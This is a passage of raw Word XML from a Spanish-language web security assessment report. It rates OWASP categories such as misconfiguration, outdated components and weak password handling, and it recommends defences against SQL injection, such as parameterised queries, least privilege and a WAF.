          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Severidad: </w:t>
      </w:r>
      <w:r w:rsidRPr="0039383E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Alta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7B18ED" w14:textId="48473DD1" w:rsidR="00EB697F" w:rsidRPr="00EB697F" w:rsidRDefault="00EB697F" w:rsidP="00EB697F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB697F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A5 Security Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C78000E" w14:textId="77777777" w:rsidR="00EB697F" w:rsidRPr="00EB697F" w:rsidRDefault="00EB697F" w:rsidP="00EB697F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB697F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Descripción: Configuraciones inseguras, como permisos excesivos o información sensible expuesta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A70FA0" w14:textId="77777777" w:rsidR="00EB697F" w:rsidRPr="00EB697F" w:rsidRDefault="00EB697F" w:rsidP="00EB697F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB697F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Impacto en organizaciones reales: Facilita ataques posteriores y compromete la seguridad general del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3774B2" w14:textId="4613345F" w:rsidR="00EB697F" w:rsidRPr="006B288C" w:rsidRDefault="00EB697F" w:rsidP="00EB697F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB697F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Severidad: </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB697F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Alta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CCF375" w14:textId="4C89553F" w:rsidR="006B288C" w:rsidRDefault="006B288C" w:rsidP="006B288C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DBF20D5" w14:textId="565A2E25" w:rsidR="006B288C" w:rsidRPr="006B288C" w:rsidRDefault="006B288C" w:rsidP="006B288C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B288C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A6 Vulnerable &amp; Outdated Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385B5B2E" w14:textId="77777777" w:rsidR="006B288C" w:rsidRPr="006B288C" w:rsidRDefault="006B288C" w:rsidP="006B288C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B288C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Descripción: Uso de componentes desactualizados o con fallos conocidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C5B859" w14:textId="77777777" w:rsidR="006B288C" w:rsidRPr="006B288C" w:rsidRDefault="006B288C" w:rsidP="006B288C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B288C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Impacto en organizaciones reales: Los atacantes pueden aprovechar vulnerabilidades conocidas para infiltrarse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98414E" w14:textId="5444FE46" w:rsidR="006B288C" w:rsidRPr="00F133D1" w:rsidRDefault="006B288C" w:rsidP="006B288C">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B288C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Severidad: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B288C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Crítica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DBAF8C" w14:textId="2BEF4869" w:rsidR="00F133D1" w:rsidRDefault="00F133D1" w:rsidP="00F133D1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B8D354" w14:textId="26BB9C2A" w:rsidR="00F133D1" w:rsidRPr="00F133D1" w:rsidRDefault="00F133D1" w:rsidP="00F133D1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F133D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A7 Identity &amp; Auth Failure - Secure Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B90030C" w14:textId="77777777" w:rsidR="00F133D1" w:rsidRPr="00F133D1" w:rsidRDefault="00F133D1" w:rsidP="00F133D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F133D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Descripción: Falta de gestión adecuada de contraseñas, como almacenamiento inseguro o requisitos débiles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED1D2C7" w14:textId="77777777" w:rsidR="00F133D1" w:rsidRPr="00F133D1" w:rsidRDefault="00F133D1" w:rsidP="00F133D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F133D1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Impacto en organizaciones reales: Permite accesos no autorizados y aumenta el riesgo de ataques de fuerza bruta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4577E180" w14:textId="76DEE162" w:rsidR="00E118A0" w:rsidRPr="0030706A" w:rsidRDefault="00F133D1" w:rsidP="005E28EF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030706A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Severidad: </w:t>
      </w:r>
      <w:r w:rsidRPr="0030706A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="BF8F00" w:themeColor="accent4" w:themeShade="BF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Alta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21322E7B" w14:textId="0C29490E" w:rsidR="00E118A0" w:rsidRDefault="00E118A0" w:rsidP="00E118A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En la siguiente grafica se puede ver reflejado el impacto de las vulnerabilidades y otros datos claves y no menos importantes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E44952" w14:textId="1EDDA136" w:rsidR="00E118A0" w:rsidRDefault="00E118A0" w:rsidP="00E118A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377E66F7" w14:textId="3CBA5429" w:rsidR="00E118A0" w:rsidRPr="00E118A0" w:rsidRDefault="0030706A" w:rsidP="00E118A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B245BF5" wp14:editId="0221E75E">
            <wp:extent cx="5612130" cy="3286125"/>
            <wp:effectExtent l="0" t="0" r="762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3286125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC5734" w14:textId="1F4EE20B" w:rsidR="00A8151B" w:rsidRDefault="00A8151B" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A8151B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RECOMENDACIONES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD352F" w14:textId="77777777" w:rsidR="00A8151B" w:rsidRPr="00A8151B" w:rsidRDefault="00A8151B" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304283F6" w14:textId="4FFB2EE9" w:rsidR="00A8151B" w:rsidRPr="007930F0" w:rsidRDefault="00667A64" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">A3 </w:t>
      </w:r>
      <w:r w:rsidR="00A8151B" w:rsidRPr="007930F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Inyección SQL (SQL Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DE1B9D" w14:textId="5F66FF5C" w:rsidR="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5F4BE2" w14:textId="737E5D89" w:rsidR="003D04A9" w:rsidRPr="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Se sugiere inicialmente validar la siguiente página para mitigar un poco más los riesgos  </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00060AC3">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>https://owasp.org/www-community/attacks/SQL_Injection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6750C9F0" w14:textId="43F4BBDF" w:rsidR="00A8151B" w:rsidRDefault="00A8151B" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED83B7F" w14:textId="290761E0" w:rsidR="00A8151B" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Por otra </w:t>
      </w:r>
      <w:r w:rsidR="00E551EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>parte,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> para prevenir esta vulnerabilidad en aplicaciones reales, se recomienda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C7E2A2" w14:textId="0920AB71" w:rsidR="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7284F356" w14:textId="68F56954" w:rsidR="003D04A9" w:rsidRPr="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Validar y corregir entradas de usuario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5780E515" w14:textId="529B3883" w:rsidR="003D04A9" w:rsidRPr="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Utilizar funciones que limpien datos antes de incluirlos en consultas SQL (por ejemplo, usar declaraciones preparadas o consultas parametrizadas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BC69DF" w14:textId="77777777" w:rsidR="003D04A9" w:rsidRPr="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AD74C8E" w14:textId="77777777" w:rsidR="003D04A9" w:rsidRPr="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Restringir privilegios en la base de datos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034D5C3A" w14:textId="27D3E616" w:rsidR="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El usuario que ejecuta las consultas desde la aplicación debe tener privilegios mínimos necesarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072EB46F" w14:textId="77777777" w:rsidR="003D04A9" w:rsidRPr="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7959A628" w14:textId="59BCA2B1" w:rsidR="003D04A9" w:rsidRPr="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementar un WAF (Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D04A9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="single"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Firewall):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F484CE1" w14:textId="25CCC305" w:rsidR="003D04A9" w:rsidRDefault="003D04A9" w:rsidP="003563E4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="both"/>
        <w:rPr>
